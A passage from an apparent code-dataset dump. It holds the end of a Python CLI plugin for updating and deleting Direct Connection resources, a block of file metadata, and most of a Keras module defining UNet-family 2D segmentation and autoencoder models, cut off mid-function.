                   "The value can be 1G or 10G.")
        )
        parser.add_argument(
            '--provider_status',
            metavar='<provider_status>',
            help=_("Specifies the status of the carrier's leased line. "
                   "The value can be ACTIVE or DOWN.")
        )
        parser.add_argument(
            '--order_id',
            metavar='<order_id>',
            help=_("Specifies the order number of the connection.")
        )
        parser.add_argument(
            '--product_id',
            metavar='<product_id>',
            help=_("Specifies the product ID corresponding to the "
                   "connection's order.")
        )
        return parser

    def take_action(self, parsed_args):
        """Apply the requested changes and show the updated connection."""
        client = self.app.client_manager.dcaas
        # Only these attributes are updatable through this command.
        updatable = (
            'name',
            'description',
            'bandwidth',
            'provider_status',
            'order_id',
            'product_id',
        )
        # Keep only attributes the user actually supplied (truthy values).
        attrs = {
            field: getattr(parsed_args, field)
            for field in updatable
            if getattr(parsed_args, field)
        }
        if parsed_args.direct_connection:
            direct_connection = client.find_connection(
                parsed_args.direct_connection
            )
        obj = client.update_connection(
            direct_connection.id, **attrs
        )
        display_columns, columns = _get_columns(obj)
        data = utils.get_item_properties(obj, columns)
        return (display_columns, data)
class DeleteDirectConnection(command.Command):
    """Command that removes an existing Direct Connection."""

    _description = _("Delete the Direct Connection.")

    def get_parser(self, prog_name):
        """Build the argument parser for the delete command."""
        parser = super(DeleteDirectConnection, self).get_parser(prog_name)
        parser.add_argument(
            'direct_connection',
            metavar='<direct_connection>',
            help=_("Direct Connection to delete.")
        )
        return parser

    def take_action(self, parsed_args):
        """Resolve the connection by ID or name, then delete it."""
        client = self.app.client_manager.dcaas
        if parsed_args.direct_connection:
            target = client.find_connection(
                parsed_args.direct_connection)
            client.delete_connection(target.id)
| 32.901235
| 79
| 0.539212
| 1,552
| 15,990
| 5.353737
| 0.135309
| 0.054158
| 0.102299
| 0.051992
| 0.802022
| 0.799735
| 0.796847
| 0.784812
| 0.766518
| 0.74666
| 0
| 0.001564
| 0.3601
| 15,990
| 485
| 80
| 32.969072
| 0.810496
| 0.03546
| 0
| 0.724537
| 0
| 0
| 0.333312
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025463
| false
| 0
| 0.011574
| 0
| 0.085648
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fce464b5415f2aead0ab8012f6a34e10fe9dafa
| 49,703
|
py
|
Python
|
Codes/UNet_2DCNN.py
|
sucaicai4/UNet-Segmentation-AutoEncoder-1D-2D-Tensorflow-Keras
|
99824aa00f76fe75d7ebdbbcecd03151f75437a0
|
[
"MIT"
] | 1
|
2021-09-21T01:52:35.000Z
|
2021-09-21T01:52:35.000Z
|
Codes/UNet_2DCNN.py
|
sucaicai4/UNet-Segmentation-AutoEncoder-1D-2D-Tensorflow-Keras
|
99824aa00f76fe75d7ebdbbcecd03151f75437a0
|
[
"MIT"
] | null | null | null |
Codes/UNet_2DCNN.py
|
sucaicai4/UNet-Segmentation-AutoEncoder-1D-2D-Tensorflow-Keras
|
99824aa00f76fe75d7ebdbbcecd03151f75437a0
|
[
"MIT"
] | 1
|
2021-09-21T01:52:37.000Z
|
2021-09-21T01:52:37.000Z
|
'''Author: Sakib Mahmud'''
'''MIT License'''
'''Source: https://github.com/Sakib1263'''
# Import Necessary Libraries
import tensorflow as tf
def Conv_Block(inputs, model_width, kernel, multiplier):
    # 2D Convolution -> BatchNormalization -> ReLU.
    # (The original comment said "1D", but the layer used is Conv2D.)
    layers = tf.keras.layers
    out = layers.Conv2D(model_width * multiplier, kernel, padding='same')(inputs)
    out = layers.BatchNormalization()(out)
    out = layers.Activation('relu')(out)
    return out
def trans_conv2D(inputs, model_width, multiplier):
    # 2D Transposed Convolution (kernel 2x2, stride 2x2) used instead of
    # UpSampling, followed by BatchNormalization and ReLU.
    # (The original comment said "1D", but the layer is Conv2DTranspose.)
    layers = tf.keras.layers
    out = layers.Conv2DTranspose(
        model_width * multiplier, (2, 2), strides=(2, 2), padding='same')(inputs)
    out = layers.BatchNormalization()(out)
    out = layers.Activation('relu')(out)
    return out
def Concat_Block(input1, *argv):
    """Concatenate ``input1`` with each tensor in ``argv`` along the channel axis.

    Returns ``input1`` unchanged when no extra tensors are given.
    """
    cat = input1
    # Iterate the varargs directly instead of indexing via range(len(...)).
    for tensor in argv:
        cat = tf.keras.layers.concatenate([cat, tensor], axis=-1)
    return cat
def upConv_Block(inputs):
    # 2x2 UpSampling (2D, despite the original "1D" note).
    return tf.keras.layers.UpSampling2D(size=(2, 2))(inputs)
def Feature_Extraction_Block(inputs, model_width, Dim2, feature_number):
    # Bottleneck for the AutoEncoder mode: flatten -> dense embedding layer
    # (named 'features' so embeddings can be read out later) -> dense
    # expansion -> reshape back to a Dim2 x Dim2 x model_width feature map.
    flat = tf.keras.layers.Flatten()(inputs)
    embedding = tf.keras.layers.Dense(feature_number, name='features')(flat)
    expanded = tf.keras.layers.Dense(model_width * Dim2 * Dim2)(embedding)
    return tf.keras.layers.Reshape((Dim2, Dim2, model_width))(expanded)
def MultiResBlock(inputs, model_width, kernel, multiplier, alpha):
    """MultiRes block: chained conv branches concatenated, plus a 1x1 shortcut."""
    # alpha scales the filter budget of the whole block.
    w = alpha * model_width
    branch_filters = (int(w * 0.167), int(w * 0.333), int(w * 0.5))
    # 1x1 shortcut sized to match the concatenated output of the branches.
    shortcut = Conv_Block(inputs, sum(branch_filters), 1, multiplier)
    # The 5x5 and 7x7 receptive fields are approximated by chaining 3x3 convs.
    conv3x3 = Conv_Block(inputs, branch_filters[0], kernel, multiplier)
    conv5x5 = Conv_Block(conv3x3, branch_filters[1], kernel, multiplier)
    conv7x7 = Conv_Block(conv5x5, branch_filters[2], kernel, multiplier)
    merged = tf.keras.layers.concatenate([conv3x3, conv5x5, conv7x7], axis=-1)
    merged = tf.keras.layers.BatchNormalization()(merged)
    merged = tf.keras.layers.Add()([shortcut, merged])
    merged = tf.keras.layers.Activation('relu')(merged)
    merged = tf.keras.layers.BatchNormalization()(merged)
    return merged
def ResPath(inputs, model_depth, model_width, kernel, multiplier):
    """ResPath: a chain of residual units along a skip connection.

    Each unit adds a 1x1-conv shortcut to a `kernel`-sized convolution of the
    same input, then applies ReLU and BatchNormalization. The original code
    duplicated the unit once before the loop; a single loop builds the
    identical graph. `max(1, model_depth)` preserves the original edge
    behavior of always emitting at least one unit (the pre-loop copy ran
    unconditionally, even for model_depth <= 1).
    """
    out = inputs
    for _ in range(max(1, model_depth)):
        shortcut = Conv_Block(out, model_width, 1, multiplier)
        conv = Conv_Block(out, model_width, kernel, multiplier)
        out = tf.keras.layers.Add()([shortcut, conv])
        out = tf.keras.layers.Activation('relu')(out)
        out = tf.keras.layers.BatchNormalization()(out)
    return out
class UNet:
# Version 2 (v2) of all Models use Transposed Convolution instead of UpSampling
def __init__(self, length, width, model_depth, num_channel, model_width, kernel_size,
problem_type='Regression', output_nums=1, ds=0, ae=0, *argv):
# length: Input Image Length (x-dim)
# width: Input Image Width (y-dim) [Normally same as the x-dim i.e., Square shape]
# model_depth: Depth of the Model
# model_width: Width of the Model
# kernel_size: Kernel or Filter Size of the Input Convolutional Layer
# num_channel: Number of Channels of the Input Predictor Signals
# feature_number: Number of Features or Embeddings to be extracted from the AutoEncoder, only useful in the A_E Mode
# ds: Checks where Deep Supervision is active or not, either 0 or 1 [Default value set as 0]
# ae: Enables or diables the AutoEncoder Mode, either 0 or 1 [Default value set as 0]
# alpha: This Parameter is only for MultiResUNet, default value is 1
self.length = length
self.width = width
self.model_depth = model_depth
self.num_channel = num_channel
self.model_width = model_width
self.kernel_size = kernel_size
self.problem_type = problem_type
self.output_nums = output_nums
self.D_S = ds
self.A_E = ae
if len(argv) == 0 and ae == 1:
raise ValueError("Please Check the Input Parameters! Autoencoder mode was selected but arguments were not provided!")
elif len(argv) == 2 and ae == 0:
raise ValueError("Please Check the Input Parameters! Autoencoder mode was not selected but extra arguments were provided!")
elif len(argv) == 1 and ae == 1:
self.feature_number = argv[0]
elif len(argv) == 1 and ae == 0:
self.alpha = argv[0] # Alpha parameter, only for MultiResUNet
elif len(argv) == 2 and ae == 1:
self.feature_number = argv[0]
self.alpha = argv[1]
elif len(argv) > 2:
raise ValueError("Please Check the Input Parameters! More than 2 optional arguments are not expected!")
    def UNet(self):
        """Build the standard UNet (encoder-decoder with skip connections).

        Returns a ``tf.keras.Model``. With deep supervision (``self.D_S == 1``)
        the model exposes one side output per decoder level plus the final
        output; otherwise a single output. ``self.A_E == 1`` inserts a dense
        feature-extraction bottleneck (AutoEncoder mode).
        """
        # NOTE(review): invalid hyper-parameters only print a warning here;
        # graph construction continues and will fail later if they are wrong.
        if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
            print("ERROR: Please Check the Values of the Input Parameters!")
        convs = {}    # encoder stage outputs, keyed "conv1".."convN", for the skips
        levels = []   # deep-supervision side outputs (D_S mode only)
        i = 1
        # Encoding
        inputs = tf.keras.Input((self.length, self.width, self.num_channel))
        conv = Conv_Block(inputs, self.model_width, self.kernel_size, 2 ** 0)
        conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** 0)
        pool = tf.keras.layers.MaxPooling2D(pool_size=2)(conv)
        convs["conv%s" % i] = conv
        # Each deeper stage doubles the channel multiplier and halves the map.
        for i in range(2, (self.model_depth + 1)):
            conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** (i - 1))
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** (i - 1))
            pool = tf.keras.layers.MaxPooling2D(pool_size=2)(conv)
            convs["conv%s" % i] = conv
        # Collect Latent Features or Embeddings from AutoEncoders
        if (self.A_E == 0) and (self.D_S == 0):
            conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
        elif (self.A_E == 0) and (self.D_S == 1):
            conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
            # Deepest side output for deep supervision.
            level0 = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth}')(conv)
            levels.append(level0)
        elif (self.A_E == 1) and (self.D_S == 0):
            # assumes a square input (self.length used for both spatial dims) — TODO confirm
            latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
            conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
        elif (self.A_E == 1) and (self.D_S == 1):
            latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
            conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
            level0 = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth}')(conv)
            levels.append(level0)
        else:
            print("ERROR: Please Check the Values of the Input Parameters!")
        # Decoding
        convs_list = list(convs.values())
        # Deepest decoder stage: upsample the bottleneck and fuse the last skip.
        deconv = Conv_Block(Concat_Block(upConv_Block(conv), convs_list[self.model_depth - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - 1))
        deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** (self.model_depth - 1))
        for j in range(1, self.model_depth):
            if self.D_S == 0:
                deconv = Conv_Block(Concat_Block(upConv_Block(deconv), convs_list[self.model_depth - j - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1))
                deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1))
            elif self.D_S == 1:
                # Emit a 1x1-conv side output before each upsampling step.
                level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth - j}')(deconv)
                levels.append(level)
                deconv = Conv_Block(Concat_Block(upConv_Block(deconv), convs_list[self.model_depth - j - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1))
                deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1))
            else:
                print("ERROR: Please Check the Values of the Input Parameters!")
        # Output
        outputs = []
        if self.problem_type == 'Classification':
            outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
        elif self.problem_type == 'Regression':
            outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
        model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
        if self.D_S == 1:
            # Deep supervision: final output first, then the collected levels.
            levels.append(outputs)
            levels.reverse()
            model = tf.keras.Model(inputs=[inputs], outputs=levels)
        return model
    def UNet_v2(self):
        """Build the UNet, v2: transposed convolutions replace UpSampling.

        Identical topology to :meth:`UNet` except the decoder upsamples with
        ``trans_conv2D`` (learned Conv2DTranspose) instead of ``upConv_Block``.
        Returns a ``tf.keras.Model``; with ``self.D_S == 1`` the model has one
        side output per decoder level plus the final output.
        """
        # NOTE(review): invalid hyper-parameters only print a warning here.
        if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
            print("ERROR: Please Check the Values of the Input Parameters!")
        convs = {}    # encoder stage outputs for the skip connections
        levels = []   # deep-supervision side outputs
        i = 1
        # Encoding
        inputs = tf.keras.Input((self.length, self.width, self.num_channel))
        conv = Conv_Block(inputs, self.model_width, self.kernel_size, 2 ** 0)
        conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** 0)
        pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
        convs["conv%s" % i] = conv
        for i in range(2, (self.model_depth + 1)):
            conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** (i - 1))
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** (i - 1))
            pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
            convs["conv%s" % i] = conv
        # Collect Latent Features or Embeddings from AutoEncoders
        if (self.A_E == 0) and (self.D_S == 0):
            conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
        elif (self.A_E == 0) and (self.D_S == 1):
            conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
            # Deepest side output for deep supervision.
            level0 = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth}')(conv)
            levels.append(level0)
        elif (self.A_E == 1) and (self.D_S == 0):
            # assumes a square input (self.length used for both dims) — TODO confirm
            latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
            conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
        elif (self.A_E == 1) and (self.D_S == 1):
            latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
            conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
            level0 = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth}')(conv)
            levels.append(level0)
        else:
            print("ERROR: Please Check the Values of the Input Parameters!")
        # Decoding
        convs_list = list(convs.values())
        # Deepest decoder stage: learned upsampling, then fuse the last skip.
        deconv = trans_conv2D(conv, self.model_width, 2 ** (self.model_depth - 1))
        deconv = Conv_Block(Concat_Block(deconv, convs_list[self.model_depth - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - 1))
        deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** (self.model_depth - 1))
        for j in range(1, self.model_depth):
            if self.D_S == 0:
                deconv = trans_conv2D(deconv, self.model_width, 2 ** (self.model_depth - j - 1))
                deconv = Conv_Block(Concat_Block(deconv, convs_list[self.model_depth - j - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1))
                deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1))
            elif self.D_S == 1:
                # Emit a 1x1-conv side output before each upsampling step.
                level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth - j}')(deconv)
                levels.append(level)
                deconv = trans_conv2D(deconv, self.model_width, 2 ** (self.model_depth - j - 1))
                deconv = Conv_Block(Concat_Block(deconv, convs_list[self.model_depth - j - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1))
                deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1))
            else:
                print("ERROR: Please Check the Values of the Input Parameters!")
        # Output
        outputs = []
        if self.problem_type == 'Classification':
            outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
        elif self.problem_type == 'Regression':
            outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
        model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
        if self.D_S == 1:
            # Deep supervision: final output first, then the collected levels.
            levels.append(outputs)
            levels.reverse()
            model = tf.keras.Model(inputs=[inputs], outputs=levels)
        return model
    def UNetE(self):
        """Build the Ensemble UNet (UNetE): nested decoders over all scales.

        The decoder is a triangular grid ``deconvs[j][i]`` (row j = spatial
        level, column i = decoder stage); each node fuses the encoder skip at
        its level with the upsampled node below. Returns a ``tf.keras.Model``.
        """
        # NOTE(review): invalid hyper-parameters only print a warning here.
        if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
            print("ERROR: Please Check the Values of the Input Parameters!")
        convs = {}    # encoder stage outputs for the skip connections
        levels = []   # deep-supervision side outputs
        i = 1
        # Encoding
        inputs = tf.keras.Input((self.length, self.width, self.num_channel))
        conv = Conv_Block(inputs, self.model_width, self.kernel_size, 2 ** 0)
        conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** 0)
        pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
        convs["conv%s" % i] = conv
        for i in range(2, (self.model_depth + 1)):
            conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** (i - 1))
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** (i - 1))
            pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
            convs["conv%s" % i] = conv
        # Collect Latent Features or Embeddings from AutoEncoders
        if self.A_E == 0:
            conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
        elif self.A_E == 1:
            # assumes a square input (self.length used for both dims) — TODO confirm
            latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
            conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
        else:
            print("ERROR: Please Check the Values of the Input Parameters!")
        # Decoding
        convs_list = list(convs.values())
        if self.D_S == 1:
            # Side output at full resolution from the first encoder stage.
            level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth}')(convs_list[0])
            levels.append(level)
        # NOTE(review): the "deconv%s%s" key is two concatenated digits, so it
        # becomes ambiguous for model_depth >= 10.
        deconvs = {}
        for i in range(1, (self.model_depth + 1)):
            for j in range(0, (self.model_depth - i + 1)):
                if (i == 1) and (j == (self.model_depth - 1)):
                    # First stage, deepest level: upsample the bottleneck.
                    deconv = Conv_Block(Concat_Block(convs_list[j], upConv_Block(conv)), self.model_width, self.kernel_size, 2 ** j)
                    deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                    deconvs["deconv%s%s" % (j, i)] = deconv
                elif (i == 1) and (j < (self.model_depth - 1)):
                    # First stage, shallower levels: upsample the encoder output below.
                    deconv = Conv_Block(Concat_Block(convs_list[j], upConv_Block(convs_list[j + 1])), self.model_width, self.kernel_size, 2 ** j)
                    deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                    deconvs["deconv%s%s" % (j, i)] = deconv
                elif i > 1:
                    # Later stages: fuse the encoder skip with the previous-stage node below.
                    deconv = Conv_Block(Concat_Block(convs_list[j], upConv_Block(deconvs["deconv%s%s" % ((j + 1), (i - 1))])), self.model_width, self.kernel_size, 2 ** j)
                    deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                    deconvs["deconv%s%s" % (j, i)] = deconv
                if (self.D_S == 1) and (j == 0) and (i < self.model_depth):
                    # Side output from each intermediate full-resolution node.
                    level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth - i}')(deconvs["deconv%s%s" % (j, i)])
                    levels.append(level)
        deconv = deconvs["deconv%s%s" % (0, self.model_depth)]
        # Output
        outputs = []
        if self.problem_type == 'Classification':
            outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
        elif self.problem_type == 'Regression':
            outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
        model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
        if self.D_S == 1:
            # Deep supervision: final output first, then the collected levels.
            levels.append(outputs)
            levels.reverse()
            model = tf.keras.Model(inputs=[inputs], outputs=levels)
        return model
    def UNetE_v2(self):
        """Build the Ensemble UNet, v2: transposed convolutions for upsampling.

        Same nested-decoder topology as :meth:`UNetE`, but each upsampling uses
        ``trans_conv2D`` (learned Conv2DTranspose) instead of ``upConv_Block``.
        Returns a ``tf.keras.Model``.
        """
        # NOTE(review): invalid hyper-parameters only print a warning here.
        if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
            print("ERROR: Please Check the Values of the Input Parameters!")
        convs = {}    # encoder stage outputs for the skip connections
        levels = []   # deep-supervision side outputs
        i = 1
        # Encoding
        inputs = tf.keras.Input((self.length, self.width, self.num_channel))
        conv = Conv_Block(inputs, self.model_width, self.kernel_size, 2 ** 0)
        conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** 0)
        pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
        convs["conv%s" % i] = conv
        for i in range(2, (self.model_depth + 1)):
            conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** (i - 1))
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** (i - 1))
            pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
            convs["conv%s" % i] = conv
        # Collect Latent Features or Embeddings from AutoEncoders
        if self.A_E == 0:
            conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
        elif self.A_E == 1:
            # assumes a square input (self.length used for both dims) — TODO confirm
            latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
            conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
        else:
            print("ERROR: Please Check the Values of the Input Parameters!")
        # Decoding
        convs_list = list(convs.values())
        if self.D_S == 1:
            # Side output at full resolution from the first encoder stage.
            level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth}')(convs_list[0])
            levels.append(level)
        # NOTE(review): "deconv%s%s" keys are ambiguous for model_depth >= 10.
        deconvs = {}
        for i in range(1, (self.model_depth + 1)):
            for j in range(0, (self.model_depth - i + 1)):
                if (i == 1) and (j == (self.model_depth - 1)):
                    # First stage, deepest level: upsample the bottleneck.
                    deconv = trans_conv2D(conv, self.model_width, 2 ** j)
                    deconv = Conv_Block(Concat_Block(convs_list[j], deconv), self.model_width, self.kernel_size, 2 ** j)
                    deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                    deconvs["deconv%s%s" % (j, i)] = deconv
                elif (i == 1) and (j < (self.model_depth - 1)):
                    # First stage, shallower levels: upsample the encoder output below.
                    deconv = trans_conv2D(convs_list[j + 1], self.model_width, 2 ** j)
                    deconv = Conv_Block(Concat_Block(convs_list[j], deconv), self.model_width, self.kernel_size, 2 ** j)
                    deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                    deconvs["deconv%s%s" % (j, i)] = deconv
                elif i > 1:
                    # Later stages: fuse the encoder skip with the previous-stage node below.
                    deconv = trans_conv2D(deconvs["deconv%s%s" % ((j + 1), (i - 1))], self.model_width, 2 ** j)
                    deconv = Conv_Block(Concat_Block(convs_list[j], deconv), self.model_width, self.kernel_size, 2 ** j)
                    deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                    deconvs["deconv%s%s" % (j, i)] = deconv
                if (self.D_S == 1) and (j == 0) and (i < self.model_depth):
                    # Side output from each intermediate full-resolution node.
                    level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth - i}')(deconvs["deconv%s%s" % (j, i)])
                    levels.append(level)
        deconv = deconvs["deconv%s%s" % (0, self.model_depth)]
        # Output
        outputs = []
        if self.problem_type == 'Classification':
            outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
        elif self.problem_type == 'Regression':
            outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
        model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
        if self.D_S == 1:
            # Deep supervision: final output first, then the collected levels.
            levels.append(outputs)
            levels.reverse()
            model = tf.keras.Model(inputs=[inputs], outputs=levels)
        return model
    def UNetP(self):
        """Build the UNet+ model: densely chained decoder stages.

        Like :meth:`UNetE`, but at stages ``i > 1`` each node concatenates the
        *previous-stage node at the same level* (instead of the encoder skip)
        with the upsampled node below. Returns a ``tf.keras.Model``.
        """
        # NOTE(review): invalid hyper-parameters only print a warning here.
        if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
            print("ERROR: Please Check the Values of the Input Parameters!")
        convs = {}    # encoder stage outputs for the skip connections
        levels = []   # deep-supervision side outputs
        i = 1
        # Encoding
        inputs = tf.keras.Input((self.length, self.width, self.num_channel))
        conv = Conv_Block(inputs, self.model_width, self.kernel_size, 2 ** 0)
        conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** 0)
        pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
        convs["conv%s" % i] = conv
        for i in range(2, (self.model_depth + 1)):
            conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** (i - 1))
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** (i - 1))
            pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
            convs["conv%s" % i] = conv
        # Collect Latent Features or Embeddings from AutoEncoders
        if self.A_E == 0:
            conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
        elif self.A_E == 1:
            # assumes a square input (self.length used for both dims) — TODO confirm
            latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
            conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
        else:
            print("ERROR: Please Check the Values of the Input Parameters!")
        # Decoding
        convs_list = list(convs.values())
        if self.D_S == 1:
            # Side output at full resolution from the first encoder stage.
            level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth}')(convs_list[0])
            levels.append(level)
        # NOTE(review): "deconv%s%s" keys are ambiguous for model_depth >= 10.
        deconvs = {}
        for i in range(1, (self.model_depth + 1)):
            for j in range(0, (self.model_depth - i + 1)):
                if (i == 1) and (j == (self.model_depth - 1)):
                    # First stage, deepest level: upsample the bottleneck.
                    deconv = Conv_Block(Concat_Block(convs_list[j], upConv_Block(conv)), self.model_width, self.kernel_size, 2 ** j)
                    deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                    deconvs["deconv%s%s" % (j, i)] = deconv
                elif (i == 1) and (j < (self.model_depth - 1)):
                    # First stage, shallower levels: upsample the encoder output below.
                    deconv = Conv_Block(Concat_Block(convs_list[j], upConv_Block(convs_list[j + 1])), self.model_width, self.kernel_size, 2 ** j)
                    deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                    deconvs["deconv%s%s" % (j, i)] = deconv
                elif i > 1:
                    # Later stages: fuse the same-level previous-stage node with the upsampled node below.
                    deconv = Conv_Block(Concat_Block(deconvs["deconv%s%s" % (j, (i - 1))], upConv_Block(deconvs["deconv%s%s" % ((j + 1), (i - 1))])), self.model_width, self.kernel_size, 2 ** j)
                    deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                    deconvs["deconv%s%s" % (j, i)] = deconv
                if (self.D_S == 1) and (j == 0) and (i < self.model_depth):
                    # Side output from each intermediate full-resolution node.
                    level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth - i}')(deconvs["deconv%s%s" % (j, i)])
                    levels.append(level)
        deconv = deconvs["deconv%s%s" % (0, self.model_depth)]
        # Output
        outputs = []
        if self.problem_type == 'Classification':
